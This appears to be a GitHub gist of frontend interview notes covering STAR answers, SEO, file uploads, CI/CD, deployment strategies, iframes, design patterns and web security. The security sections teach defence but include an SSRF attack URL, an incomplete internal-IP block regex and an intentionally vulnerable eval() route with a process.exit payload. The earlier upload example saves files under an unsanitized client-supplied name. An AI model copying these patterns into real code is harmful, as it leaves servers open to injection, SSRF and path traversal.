}


Behavioural Rounds

The STAR Method is a structured approach used to answer behavioral interview questions effectively. It helps you present your experiences clearly and concisely, focusing on real-world examples.


STAR Method Breakdown:

  1. S - Situation

    • Describe the context or background of the scenario.
    • Where were you? What was the challenge? Who was involved?
  2. T - Task

    • Explain your specific role and responsibility in that situation.
    • What was expected of you? What were the challenges?
  3. A - Action

    • Describe the specific actions you took to address the challenge.
    • Focus on your contributions, not just the team's.
    • Highlight technical decisions, collaboration, and problem-solving skills.
  4. R - Result

    • Share the outcome of your actions.
    • Quantify results if possible (e.g., improved performance by 20%, reduced errors by 50%).
    • Mention key takeaways and lessons learned.

Example STAR Response (Frontend Engineer - Performance Optimization)

Question:

"Tell me about a time when you improved the performance of a web application."

S - Situation:

"At my previous company, we had a React-based web app that was experiencing slow load times, especially for users with slower internet connections. Our Lighthouse performance score was around 50-60, and customers reported laggy interactions."

T - Task:

"My responsibility was to identify and implement optimizations to improve performance without breaking existing features."

A - Action:

"I started by running performance audits using Lighthouse and WebPageTest to identify bottlenecks. I found that large JavaScript bundles, unoptimized images, and excessive re-renders were the main issues. To fix this, I:"

  • Implemented code-splitting using React’s React.lazy() and Suspense.
  • Optimized images using WebP format and lazy loading.
  • Reduced unnecessary re-renders by properly using useMemo and useCallback.
  • Enabled server-side rendering (SSR) in Next.js for faster initial loads.
  • Cached API responses with React Query to reduce redundant network calls.

R - Result:

"As a result, the app’s Lighthouse performance score improved from 60 to 95. The first contentful paint (FCP) time reduced by 40%, and time to interactive improved significantly. Customer complaints about slow load times dropped by 50%. My optimizations were later adopted across other projects in the company."


STAR Example: Handling Conflict in a Team

Question:

"Tell me about a time you had a conflict with a team member. How did you resolve it?"


S - Situation:

"In one of my projects, I was working with another frontend developer on a React-based dashboard. We had different opinions on state management—he preferred Redux, while I suggested React Query for better API caching and performance. This led to disagreements, delaying development progress."

T - Task:

"As a team member responsible for frontend architecture, it was my job to ensure we made the best technical choice while maintaining team harmony."

A - Action:

"Instead of arguing, I suggested a data-driven approach. I proposed a technical comparison where we evaluated Redux vs. React Query based on:"

  • Performance impact (memory usage, re-renders, and API calls).
  • Ease of use (boilerplate code, debugging, and maintainability).
  • Scalability (how well it fits our project needs).

"I created a small POC (proof of concept) implementing both approaches and shared the results with the team. We also considered feedback from backend engineers regarding API caching."

R - Result:

"The data showed that React Query reduced API calls by 40%, simplified state management, and improved performance. My teammate appreciated the approach, and we collaboratively agreed to use React Query. The experience strengthened our professional relationship, and our team adopted a similar decision-making strategy for future debates."


Making SEO better

🔹 Meta Title (<title> tag)
<title>Best SEO Tips & Strategies for Higher Rankings | MyWebsite</title>

🔹 Meta Description (<meta name="description">)
<meta name="description" content="Learn the best SEO tips, strategies, and techniques to rank higher on Google. Improve your website’s visibility with expert insights.">

🔹 Viewport Meta Tag (<meta name="viewport">)
<meta name="viewport" content="width=device-width, initial-scale=1">


1. Technical SEO

Improve Site Speed:

  • Use a CDN (Content Delivery Network).
  • Optimize images (use WebP format, compress large files).
  • Minify CSS, JavaScript, and HTML.
  • Enable lazy loading for images.
  • Implement caching using tools like Redis or browser cache.

2. On-Page SEO

Optimize Images with Alt Text:

  • Use descriptive alt text for images to improve accessibility and SEO.

Improve URL Structure:

  • Keep URLs short and keyword-rich (/best-seo-tips instead of /post123).

Use Internal Linking Strategically:

  • Link to relevant pages using anchor text to improve navigation and SEO.

Use semantic HTML tags like main, section, header:
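
For example, a minimal semantic page skeleton (illustrative markup):

<header>
  <nav><a href="/">Home</a></nav>
</header>
<main>
  <section>
    <h1>Best SEO Tips</h1>
    <p>Content goes here.</p>
  </section>
</main>
<footer>© MyWebsite</footer>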


yogain123 commented Feb 6, 2025

Base64 Vs Binary Images from Frontend

  • In FormData - Direct BLOB (Binary Large Object) is sent to BE
  • In Base64 - BLOB (Binary Large Object) is converted to Base64 and then sent in body

To send a file from your React frontend to the backend in Base64 format, follow these steps:


Frontend (React) - Convert File to Base64 & Send via Fetch

  1. Select a file using an <input> element.
  2. Convert the file to Base64 using FileReader.
  3. Send the Base64 string in the request body.

React Code (Frontend)

import React, { useState } from "react";

const FileUpload = () => {
  const [fileBase64, setFileBase64] = useState("");

  const handleFileChange = (event) => {
    const file = event.target.files[0];
    if (!file) return;

    const reader = new FileReader();
    reader.readAsDataURL(file); // Convert to Base64
    reader.onload = () => {
      setFileBase64(reader.result.split(",")[1]); // Remove the data type prefix
    };
  };

  const handleUpload = async () => {
    if (!fileBase64) {
      alert("Please select a file first.");
      return;
    }

    const payload = {
      fileName: "example.png", // Can be dynamic
      fileData: fileBase64, // The actual Base64 content
    };

    try {
      const response = await fetch("http://localhost:5000/upload", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });

      const result = await response.json();
      console.log("Upload success:", result);
    } catch (error) {
      console.error("Upload failed:", error);
    }
  };

  return (
    <div>
      <input type="file" onChange={handleFileChange} />
      <button onClick={handleUpload}>Upload</button>
    </div>
  );
};

export default FileUpload;

Backend (Node.js with Express) - Decode Base64 & Save the File

Your backend should:

  1. Accept a JSON payload with fileData (Base64 string) and fileName.
  2. Decode Base64 to binary.
  3. Save the file to disk.

Node.js + Express Backend

const express = require("express");
const fs = require("fs");
const path = require("path");
const app = express();
const PORT = 5000;

// Middleware to parse JSON
app.use(express.json({ limit: "10mb" })); // Increase limit if needed

app.post("/upload", async (req, res) =&gt; {
  try {
    const { fileName, fileData } = req.body;

    if (!fileName || !fileData) {
      return res.status(400).json({ message: "Missing file data" });
    }

    // Convert Base64 to Buffer
    const buffer = Buffer.from(fileData, "base64");

    // Define file path
    const filePath = path.join(__dirname, "uploads", fileName);

    // Ensure uploads directory exists
    if (!fs.existsSync("uploads")) {
      fs.mkdirSync("uploads");
    }

    // Save file
    fs.writeFileSync(filePath, buffer);
    
    res.json({ message: "File uploaded successfully", filePath });
  } catch (error) {
    res.status(500).json({ message: "Error uploading file", error });
  }
});

app.listen(PORT, () => {
  console.log(`Server running on http://localhost:${PORT}`);
});

How It Works

  1. User selects a file in the React UI.
  2. The file is converted to Base64 using FileReader.
  3. React sends the Base64 string to the backend via fetch().
  4. The backend:
    • Receives the Base64 string.
    • Decodes it into binary format.
    • Saves the file to the uploads directory.

Alternative Approach (FormData)

If your backend does not require Base64, it's more efficient to use FormData (sends the file as binary):

React - Send as FormData

const handleUpload = async () => {
  const formData = new FormData();
  formData.append("file", selectedFile);

  // Note: do not set the Content-Type header manually here —
  // the browser adds "multipart/form-data" with the correct boundary automatically.
  const response = await fetch("http://localhost:5000/upload", {
    method: "POST",
    body: formData,
  });

  const result = await response.json();
  console.log("Upload success:", result);
};

Backend - Express with Multer

const multer = require("multer");
const upload = multer({ dest: "uploads/" });

app.post("/upload", upload.single("file"), (req, res) =&gt; {
  res.json({ message: "File uploaded", filePath: req.file.path });
});

FileReader In details

import React, { useState } from "react";
import "./App.css";

function App() {
  const [fileData, setFileData] = useState({
    arrayBuffer: null,
    dataUrl: null,
    text: null,
  });

  const handleFileChange = (event) => {
    const file = event.target.files[0];

    // For ArrayBuffer - for images etc - non text
    const reader1 = new FileReader();
    reader1.onload = (e) => {
      setFileData((prev) => ({ ...prev, arrayBuffer: e.target.result }));
    };
    reader1.readAsArrayBuffer(file);

    // For DataURL -> to show on UI directly
    const reader2 = new FileReader();
    reader2.onload = (e) => {
      setFileData((prev) => ({ ...prev, dataUrl: e.target.result }));
    };
    reader2.readAsDataURL(file);

    // For Text - for text file like csv, .json, .js , .txt etc
    const reader3 = new FileReader();
    reader3.onload = (e) => {
      setFileData((prev) => ({ ...prev, text: e.target.result }));
    };
    reader3.readAsText(file);
  };

  return (
    <div>
      <input type="file" onChange={handleFileChange} />

      {fileData.dataUrl && (
        <img
          src={fileData.dataUrl}
          alt="Preview"
          style={{ maxWidth: "300px" }}
        />
      )}

      {fileData.text && <pre>{fileData.text}</pre>}

      {fileData.arrayBuffer && (
        <p>File size in bytes: {fileData.arrayBuffer.byteLength}</p>
      )}
    </div>
  );
}

export default App;

multipart talks

Why Is multipart/form-data Used for File Uploads?

When uploading files via FormData, the request goes out with the header Content-Type: multipart/form-data; boundary=... (the browser sets this automatically when the body is a FormData object; do not set it manually, or the boundary will be missing). This format is necessary because the file needs to be sent in a way that the server can properly parse and process.


Does This Mean the File Is Sent in Chunks?

Yes and No

  • Yes, because multipart/form-data splits the request body into multiple parts (text fields + files) using a boundary string.
  • No, because it's not "chunked" like streaming; instead, the entire file is still part of a single HTTP request.

How Does multipart/form-data Work?

  1. Each part of the request (including the file) is separated by a unique boundary string.
  2. The file is sent as raw binary data within the body, making it more efficient than encoding it into base64.
  3. The server extracts the file and other fields based on the boundaries.

Example of multipart/form-data Request Body

When you send a file using FormData, your request body looks something like this:

------WebKitFormBoundaryXyz
Content-Disposition: form-data; name="username"

JohnDoe
------WebKitFormBoundaryXyz
Content-Disposition: form-data; name="file"; filename="image.png"
Content-Type: image/png

(binary file data here)
------WebKitFormBoundaryXyz--

  • Each part has a header (e.g., Content-Disposition) that tells the server what the field represents.
  • The file is sent as raw binary data, not encoded (which keeps it small and fast).
  • The boundary string (------WebKitFormBoundaryXyz) separates parts of the request.


HLD - Ticket Booking System

Ticket Booking System - https://excalidraw.com/#json=yjZFXJdRdHu4e4R2-n-9C,AoIqj9Gia_F-MRl8ZJxA0A


CI/CD Process


CI/CD in Frontend Development (Explained in Detail & Easy Manner)

CI/CD stands for Continuous Integration (CI) and Continuous Deployment (CD). It is a process that helps developers automate testing and deployment so that code changes can be delivered quickly, safely, and efficiently.


1. Understanding CI (Continuous Integration)

What is CI?

CI is the process where developers frequently push code to a shared repository (like GitHub, GitLab, or Bitbucket). Every time code is pushed, it is automatically built, tested, and verified to ensure nothing breaks.

Steps in CI (Frontend Perspective)

🔹 Step 1: Developer Writes Code

  • You make changes in your frontend code (React, Angular, Vue, etc.).
  • You push the code to a Git repository (e.g., GitHub).

🔹 Step 2: Automated Build Process

  • CI tools (Jenkins, GitHub Actions, GitLab CI, CircleCI) detect the new changes.
  • The build process starts (e.g., Webpack, Vite, Babel compile the code).
  • If there are errors, the build fails immediately.

🔹 Step 3: Automated Testing

  • Runs unit tests (e.g., Jest, Mocha, Cypress for frontend).
  • Runs linting checks (ESLint, Prettier).
  • Runs static code analysis (SonarQube, CodeClimate).
  • If tests pass, the process continues. Otherwise, developers fix issues.

CI ensures every new code change is verified, tested, and bug-free before merging.


2. Understanding CD (Continuous Deployment/Delivery)

What is CD?

CD is the process of automatically deploying the tested and verified code to a staging or production environment.

There are two variations:

  1. Continuous Delivery – Code is deployed to a staging environment, but deployment to production requires manual approval.
  2. Continuous Deployment – Code is automatically deployed to production without manual approval.

Steps in CD (Frontend Perspective)

🔹 Step 4: Deployment to Staging

  • Once CI is successful, the code is deployed to a staging environment.
  • Staging is a testing ground that mimics production.

🔹 Step 5: Manual or Automated Approval for Production

  • If the company uses Continuous Delivery, a human approves before deploying to production.
  • If using Continuous Deployment, the system automatically deploys.

🔹 Step 6: Deployment to Production

  • The frontend code is uploaded to a CDN (e.g., Cloudflare, AWS S3 + CloudFront, Vercel, Netlify).
  • The application is now live for users!

CD ensures that the latest changes reach users quickly and safely.


3. Real-Life Frontend CI/CD Example with GitHub Actions

name: CI/CD Pipeline

on:
  push:
    branches:
      - main  # Runs on main branch push

jobs:
  build_and_test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: npm install

      - name: Run Linter
        run: npm run lint

      - name: Run Tests
        run: npm run test

      - name: Build Application
        run: npm run build

  deploy:
    needs: build_and_test
    runs-on: ubuntu-latest
    steps:
      - name: Deploy to S3
        run: aws s3 sync ./build s3://my-frontend-bucket --delete

This workflow automatically builds, tests, and deploys frontend code!


Deployments

What Exactly Happens During Deployment in CI/CD?

You already understand CI (Continuous Integration)—it handles build, testing, and linting. Now, let’s go deep into CD (Continuous Deployment/Delivery) and understand what happens internally when we deploy React (frontend), Node.js (backend), CDN (static assets), and Database changes.


1. What is Deployment Actually Doing?

When we say, "Deploy to staging (stg) or production (prod)," the process involves:
Packing the app (React build, Node.js files, DB migrations).
Uploading to a hosting platform (AWS, Vercel, Netlify, Docker, Kubernetes).
Updating services (backend API servers, CDN assets, databases).
Switching traffic (blue-green deployment, canary release, etc.).


2. Deployment Internals for React (Frontend Apps)

Scenario: Deploying a React app to AWS S3 + CloudFront

Step-by-Step Internal Process

1️⃣ The Build is Uploaded to a Storage Bucket (AWS S3, Vercel, Netlify, Firebase Hosting)

  • When you run npm run build, React creates a build/ folder with:
    build/
    ├── index.html
    ├── static/
        ├── js/ (hashed JS files)
        ├── css/ (hashed CSS files)
        ├── media/ (optimized images)
    
  • These files are uploaded to AWS S3 or another hosting provider.
    aws s3 sync build/ s3://my-react-app --delete

2️⃣ CDN (CloudFront, Vercel) Caches and Distributes the Files

  • The CDN caches these files across global edge locations.
  • If an old version exists, we invalidate the cache to force updates:
    aws cloudfront create-invalidation --distribution-id ABC123 --paths "/*"
  • This ensures users always get the latest frontend code.

3️⃣ DNS & Routing Updates

  • If using Vercel or Netlify, the deployment happens automatically, and the domain is updated.
  • If using AWS Route 53 (custom domain), we update DNS to point to the latest CloudFront distribution.

Now, when users visit the website, they fetch the latest React files via CDN.


3. Deployment Internals for Node.js (Backend)

Scenario: Deploying a Node.js API (Express.js, NestJS, or Next.js SSR) to AWS EC2

Step-by-Step Internal Process

1️⃣ Package the Code as a Deployable Unit

  • If using plain Node.js, we package the files and node_modules (or use Docker).
  • If using TypeScript, we compile it (tsc generates JS files).

2️⃣ Upload to a Remote Server

  • Using SSH & SCP (manual method):
    scp -r ./dist user@server:/var/www/myapp
  • Using AWS Elastic Beanstalk / Lambda / Docker:
    eb deploy    # Elastic Beanstalk

3️⃣ Start the Node.js Process

  • If using PM2 (Process Manager):
    pm2 start server.js --name "backend"
  • If using Docker, pull the latest image:
    docker pull my-backend:latest
    docker run -d -p 3000:3000 my-backend

4️⃣ Configure Load Balancer and Traffic Routing

  • If using Nginx or AWS ALB, it routes traffic to the Node.js instance.
  • If using Kubernetes, the Ingress Controller updates the routing.

Now, the backend API is live, and client requests are served by the latest Node.js version.


yogain123 commented Feb 8, 2025

Deployment Strategies: Rolling Update vs. Canary Deployment vs Blue Green Deployment

When deploying new versions of an application, we need strategies to ensure zero downtime, smooth rollouts, and safe rollbacks in case of failure. Three common deployment strategies are Rolling Updates, Canary Deployments, and Blue-Green Deployments.


1️⃣ Rolling Update

What is a Rolling Update?

A Rolling Update replaces old application instances gradually, without taking down the entire service.

How It Works?

  1. A new version of the app (v2) is deployed gradually, replacing instances of the old version (v1).
  2. New instances are started, while old instances are terminated in batches.
  3. Traffic is always available because at least some instances are running.
  4. If an issue is detected, the update can be paused or rolled back.

Example: Rolling Update in Kubernetes

Kubernetes updates pods one by one (or in batches) while keeping the service running.

Deployment YAML

apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-app
spec:
  replicas: 4  # 4 instances running
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 1  # At most 1 pod down at a time
      maxSurge: 1  # Add at most 1 new pod at a time
  template:
    spec:
      containers:
        - name: app
          image: my-app:v2  # New version of the app

🚀 What Happens?

  • Step 1: One old pod (v1) is terminated.
  • Step 2: A new pod (v2) is started.
  • Step 3: Repeat until all pods are updated.
  • If an error occurs? Rollback to my-app:v1.

When to Use Rolling Updates?

✔️ Works well if new updates are safe (e.g., UI fixes, minor API changes).
✔️ Ensures zero downtime and smooth rollouts.
❌ If a bug exists in the new version, all instances will eventually have the issue before it's detected.


2️⃣ Canary Deployment

What is Canary Deployment?

A Canary Deployment releases the new version to a small percentage of users first. If everything is stable, the update gradually rolls out to more users.

How It Works

  1. Deploy v2 to 5% of users while keeping 95% on v1.
  2. Monitor logs, errors, and performance.
  3. If v2 is stable, increase traffic (e.g., 25%, 50%, 100%).
  4. If v2 has issues, rollback to v1 before affecting all users.

Example: Canary Deployment with Nginx

We use Nginx to send only 5% of requests to the new version.

upstream old_version {
  server old-app.example.com;
}

upstream new_version {
  server new-app.example.com;
}

# split_clients hashes the client IP and deterministically sends ~5% of clients to the new version
split_clients "${remote_addr}" $target_version {
  5%  new_version;
  *   old_version;
}

server {
  listen 80;

  location / {
    proxy_pass http://$target_version;
  }
}
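
The same 5% split can also be done at the application layer instead of in Nginx. A minimal Node.js sketch using the node-http-proxy package (hostnames, port, and percentage are placeholders):

// canary-proxy.js - send ~5% of requests to the new version
const http = require("http");
const httpProxy = require("http-proxy");

const proxy = httpProxy.createProxyServer({});
const OLD_VERSION = "http://old-app.example.com";
const NEW_VERSION = "http://new-app.example.com";
const CANARY_PERCENT = 5;

http
  .createServer((req, res) => {
    // Pick a target per request; real setups usually hash a user/session id
    // so the same user consistently sees the same version.
    const target = Math.random() * 100 < CANARY_PERCENT ? NEW_VERSION : OLD_VERSION;
    proxy.web(req, res, { target });
  })
  .listen(8080);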

🔹 Blue-Green Deployment (Zero-Downtime Deployment Strategy)

1️⃣ What is Blue-Green Deployment?

Blue-Green Deployment is a zero-downtime deployment strategy where you have two identical environments:

  • 🔵 Blue (Current Live Version)
  • 🟢 Green (New Version Ready for Deployment)

At any time, only one of them is live. When the new version (Green) is ready, traffic is switched instantly from Blue to Green. If issues occur, you can rollback instantly by switching traffic back to Blue.


2️⃣ How Blue-Green Deployment Works

1️⃣ Run two environments (Blue & Green)

  • Blue serves live traffic.
  • Green runs the new version but does not get live traffic yet.

2️⃣ Test the Green Environment

  • Perform integration tests and monitor logs.
  • Ensure the new version (Green) is stable.

3️⃣ Switch Traffic to Green

  • Modify Load Balancer (NGINX, AWS ALB, Kubernetes Ingress, etc.)
  • Users now access Green instead of Blue.

4️⃣ Keep Blue as a Backup

  • If an issue arises, switch back to Blue instantly.

5️⃣ Delete Blue (Optional)

  • If Green is stable, delete Blue or use it for the next release.

3️⃣ Real-World Example: Blue-Green Deployment

🔹 Example 1: Blue-Green Deployment in AWS (Using ALB)

Amazon Web Services (AWS) Application Load Balancer (ALB) allows traffic switching.

  • Step 1: Deploy Blue (v1) on EC2 / ECS / Kubernetes.
  • Step 2: Deploy Green (v2) on a separate instance.
  • Step 3: Test Green using a temporary staging URL.
  • Step 4: When Green is stable, update ALB Target Group to redirect all traffic to Green.
  • Step 5: If issues occur, switch back to Blue instantly.
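
Step 4 (the actual traffic switch) comes down to one API call that repoints the ALB listener at the Green target group. A minimal Node.js sketch using the AWS SDK v3; the region and ARNs are placeholders:

// switch-to-green.js - point the ALB listener at the Green target group
const {
  ElasticLoadBalancingV2Client,
  ModifyListenerCommand,
} = require("@aws-sdk/client-elastic-load-balancing-v2");

const client = new ElasticLoadBalancingV2Client({ region: "us-east-1" });

async function switchToGreen() {
  await client.send(
    new ModifyListenerCommand({
      ListenerArn: "arn:aws:elasticloadbalancing:...",        // placeholder listener ARN
      DefaultActions: [
        {
          Type: "forward",
          TargetGroupArn: "arn:aws:elasticloadbalancing:...", // placeholder Green target group ARN
        },
      ],
    })
  );
  console.log("Traffic now routed to Green; keep Blue running for instant rollback.");
}

switchToGreen().catch(console.error);

Rolling back is the same call with the Blue target group ARN.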

@yogain123
Copy link
Author

yogain123 commented Feb 9, 2025

Iframe Access

If you want to access the parent window from an iframe, you can use:

window.parent

If you want to access a child iframe from the parent window, you can use:

iframeElem.contentWindow

Important Note:

Direct access between the parent and child iframe is only possible if both are on the same origin (protocol, domain, and port). If they are on different origins, the postMessage API is used to securely send and receive messages.

Example using postMessage:

Parent Window (parent.html):

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Parent Window</title>
</head>
<body>
    <iframe id="myIframe" src="child.html" width="400" height="200"></iframe>
    
    <button onclick="sendMessage()">Send Message to Iframe</button>
    
    <script>
        const iframe = document.getElementById("myIframe");

        function sendMessage() {
            iframe.contentWindow.postMessage("Hello from Parent!", "*"); // Sending message
        }

        window.addEventListener("message", (event) => {
            if (event.origin !== "https://trusted-domain.com") return; // Security check
            console.log("Received from iframe:", event.data);
        });
    </script>
</body>
</html>

Child Iframe (child.html):

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Child Iframe</title>
</head>
<body>
    <script>
        window.addEventListener("message", (event) => {
            if (event.origin !== "https://trusted-domain.com") return; // Security check
            console.log("Received from parent:", event.data);

            // Sending response back to parent
            event.source.postMessage("Hello from Iframe!", event.origin);
        });
    </script>
</body>
</html>

This ensures secure communication between different domains using postMessage.

@yogain123
Copy link
Author

yogain123 commented Feb 9, 2025

Design patterns

Design patterns help you write clean, maintainable, and efficient code by following best practices.
They are reusable approaches/solutions to common problems faced in software design.

In JavaScript and General Front-End

  1. Module Pattern

    • What It Is: A way to organize code into self-contained “modules” that keep details private and only expose what’s necessary.
    • Why It’s Useful: It prevents global variables from cluttering the environment and makes code easier to maintain.
    • Example:
      // Using an IIFE (Immediately Invoked Function Expression)
      const myModule = (function() {
        const privateVar = "I am hidden";
        function privateFunc() {
          console.log(privateVar);
        }
        return {
          publicFunc: function() {
            privateFunc();
          }
        };
      })();
      
      myModule.publicFunc(); // Logs: I am hidden
  2. Observer Pattern

    • What It Is: A pattern where one piece of code (the "subject") keeps a list of dependents ("observers") and notifies them automatically of any changes or events.
    • Why It’s Useful: It’s great for handling events and updating parts of your application when something changes.
    • Example:
      class EventEmitter {
        constructor() {
          this.events = {};
        }
        subscribe(event, listener) {
          if (!this.events[event]) {
            this.events[event] = [];
          }
          this.events[event].push(listener);
        }
        emit(event, data) {
          if (this.events[event]) {
            this.events[event].forEach(listener => listener(data));
          }
        }
      }
      
      const emitter = new EventEmitter();
      emitter.subscribe('greet', message => console.log(message));
      emitter.emit('greet', 'Hello, world!'); // Logs: Hello, world!
  3. Singleton Pattern

    • What It Is: A design that restricts a class to a single instance.
    • Why It’s Useful: When you need one central object (like a configuration or a state manager) that is shared across your application.
    • Example:
      const Singleton = (function() {
        let instance;
        function createInstance() {
          return { timestamp: new Date() };
        }
        return {
          getInstance: function() {
            if (!instance) {
              instance = createInstance();
            }
            return instance;
          }
        };
      })();
      
      const obj1 = Singleton.getInstance();
      const obj2 = Singleton.getInstance();
      console.log(obj1 === obj2); // true
  4. Factory Pattern

    • What It Is: A way to create objects without specifying the exact class of the object that will be created.
    • Why It’s Useful: It allows you to centralize object creation and can help in managing different types of objects based on input.
    • Example:
      function carFactory(type) {
        if (type === "sedan") {
          return { wheels: 4, type: "sedan" };
        } else if (type === "truck") {
          return { wheels: 6, type: "truck" };
        }
      }
      
      const myCar = carFactory("sedan");
      console.log(myCar); // { wheels: 4, type: "sedan" }

@yogain123
Copy link
Author

GDPR and PCI DSS

GDPR -> General Data Protection Regulation
PCI DSS -> Payment Card Industry Data Security Standard

GDPR:

  • Requires clear user consent and transparency in data collection.
  • Empowers users with rights to access, modify, or delete their data.
  • Enforces secure data storage and strict privacy practices.

PCI DSS:

  • Mandates secure handling and encryption of payment card data.
  • Requires robust network security measures (firewalls, regular scans).
  • Involves periodic audits to ensure ongoing compliance.

In Short: Both standards push you to implement strong security and privacy measures. They increase development and maintenance effort, but non-compliance can lead to hefty fines and legal issues.

@yogain123
Copy link
Author

yogain123 commented Feb 10, 2025

SSRF - Server-Side Request Forgery

What is SSRF?

  • SSRF (Server-Side Request Forgery) is when an attacker tricks a server into making unintended requests.
  • How it works: The attacker sends a malicious URL to the server, which then fetches that URL, often accessing internal or protected systems.

How Attackers Exploit SSRF:

  • They force the server to access internal resources (like 127.0.0.1, 10.x.x.x, etc.) or cloud services (e.g., metadata endpoints).
  • This can reveal sensitive information or allow further attacks.

Prevention Methods:

  • Input Validation: Only allow trusted URLs (whitelisting) and block internal IP addresses (e.g., 127.0.0.1, 192.168.x.x, etc.).
  • Network Restrictions: Use firewall rules to limit outbound requests.
  • Protocol Restrictions: Allow only necessary protocols (e.g., HTTP/HTTPS).
  • Secure Proxies: Route requests through controlled, secure proxies.
  • Regular Updates: Keep all software and libraries up-to-date.

Here's a concrete example to illustrate SSRF:

Scenario: Image Fetching Feature

The Setup:
Imagine a website that lets users add a profile picture by providing an image URL. When a user submits the URL, the server fetches the image from that URL to display it on the profile.

How It Could Go Wrong (SSRF Exploit):

  1. User Input:

    • A legitimate user enters: http://example.com/picture.jpg
    • The server fetches and displays the image.
  2. Attacker Input:

    • An attacker instead enters: http://127.0.0.1/admin
    • The server, following the same process, makes a request to http://127.0.0.1/admin—an internal address.
    • Result: The server might retrieve sensitive internal data or perform actions meant only for internal use, exposing confidential information.

Prevention Techniques in This Example

  1. Input Validation:

    • Whitelist URLs: Only allow URLs from trusted external domains.
    • Block Internal Addresses: Reject any URLs that point to internal IP addresses like 127.0.0.1, 192.168.x.x, or 10.x.x.x.
  2. Network Restrictions:

    • Configure firewall rules or server settings to prevent outgoing requests to internal IP ranges.
  3. Protocol Filtering:

    • Ensure that only the necessary protocols (e.g., HTTP/HTTPS) are allowed in the URLs.

Example (Node.js)

const http = require("http");
const { URL } = require("url");

function fetchImage(urlString) {
  const { protocol, hostname } = new URL(urlString);

  // Block non-HTTP(S) protocols and private/loopback hostnames
  if (
    !["http:", "https:"].includes(protocol) ||
    /^(localhost|127\.|10\.|192\.168\.)/.test(hostname)
  ) {
    throw new Error("Access to internal resources is not allowed.");
  }

  // Proceed to fetch the image if the URL is safe
  return http.get(urlString);
}

@yogain123
Copy link
Author

yogain123 commented Feb 10, 2025

SSJI (Server-Side JavaScript Injection)

SSJI (Server-Side JavaScript Injection) occurs when user input is directly executed as JavaScript code on the server. This can allow attackers to run arbitrary code with the same privileges as the server process.

Short Example

const express = require("express");
const app = express();

app.get("/", (req, res) => {
  // The server expects a simple arithmetic expression from the user
  const userCode = req.query.code; // e.g., "2+2"

  // Vulnerable: Directly evaluating user input
  const result = eval(userCode);
  res.send(`Result: ${result}`);
});

app.listen(3000);

Risk:
If an attacker passes malicious code (e.g., process.exit(1)), they can disrupt or compromise the server by executing unwanted commands.


How to prevent it

  1. Avoid Dynamic Code Execution: Don’t use eval or similar functions on untrusted input.
  2. Validate & Sanitize Inputs: Only allow expected characters/data (whitelisting) to prevent injection.
  3. Use Safe Libraries: Utilize libraries (e.g., math.js for arithmetic) that safely parse and evaluate expressions (see the sketch below).
  4. Sandbox Execution: If dynamic evaluation is needed, run code in a restricted environment (e.g., Node’s vm module with strict limitations).
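
For example, points 2 and 3 can be combined as below. This is a minimal sketch that assumes the same Express route as the vulnerable snippet above and the mathjs npm package:

const express = require("express");
const { evaluate } = require("mathjs"); // parses arithmetic without executing JavaScript

const app = express();

app.get("/", (req, res) => {
  const userCode = String(req.query.code || "");

  // Whitelist: digits, basic operators, parentheses, dots, and whitespace only
  if (!/^[\d+\-*/().\s]+$/.test(userCode)) {
    return res.status(400).send("Invalid expression");
  }

  try {
    const result = evaluate(userCode); // "2+2" -> 4, with no access to process, require, etc.
    res.send(`Result: ${result}`);
  } catch {
    res.status(400).send("Could not evaluate expression");
  }
});

app.listen(3000);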

@yogain123
Copy link
Author

SRI - SubResource Integrity

SubResource Integrity (SRI) is a security feature that allows browsers to verify that external resources—such as JavaScript files, CSS files, or other assets—have not been tampered with during transit.

How SRI Works:

  • Hashing the Resource: When you include an external resource, you generate a cryptographic hash (using algorithms like SHA-256, SHA-384, or SHA-512) of the file’s contents.
  • Adding the Integrity Attribute: You then include this hash in your HTML markup using the integrity attribute on the <script> or <link> tag.
  • Browser Verification: When the browser fetches the resource, it computes the hash of the downloaded file and compares it with the hash provided in the integrity attribute.
  • Action Based on Match: If the hashes match, the browser proceeds to use the resource. If they don’t, the browser blocks the resource from executing or rendering, thereby protecting the user from potentially malicious modifications.
<script src="https://example.com/script.js"
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxo7DS7FK5U4IuEKJvU03kJjgVnIDT+"
        crossorigin="anonymous"></script>

How the hash is generated
Suppose you have a file script.js:

  • You read the entire contents of script.js.
  • You run the content through a hash function like SHA-256.
  • The resulting hash (in binary) is then Base64-encoded to produce a string.
  • This string is then placed in your HTML tag as follows:
<script src="https://example.com/script.js"
        integrity="sha256-Base64EncodedHashValue"
        crossorigin="anonymous"></script>

In summary, the hash is generated solely from the file's content using a secure, standardized cryptographic hash function. This ensures that the browser can verify the integrity of the resource by re-computing the hash when the file is loaded and comparing it to the one provided in the HTML.
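
A minimal Node.js sketch of that process, using the built-in crypto module (the local file name is illustrative):

// sri-hash.js - compute an SRI value for a local copy of script.js
const crypto = require("crypto");
const fs = require("fs");

const fileContents = fs.readFileSync("script.js"); // raw bytes of the resource
const hash = crypto.createHash("sha384").update(fileContents).digest("base64");

console.log(`sha384-${hash}`);
// Paste the output into the integrity attribute:
// <script src="https://example.com/script.js" integrity="sha384-..." crossorigin="anonymous"></script>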

@yogain123
Copy link
Author

All Security

IFrame Attack
CSP - Content Security Policy

XSS - Cross-Site Scripting
CSRF - Cross-Site Request Forgery

SSRF - Server-Side Request Forgery
SSJI - Server-Side JavaScript Injection

SRI - SubResource Integrity
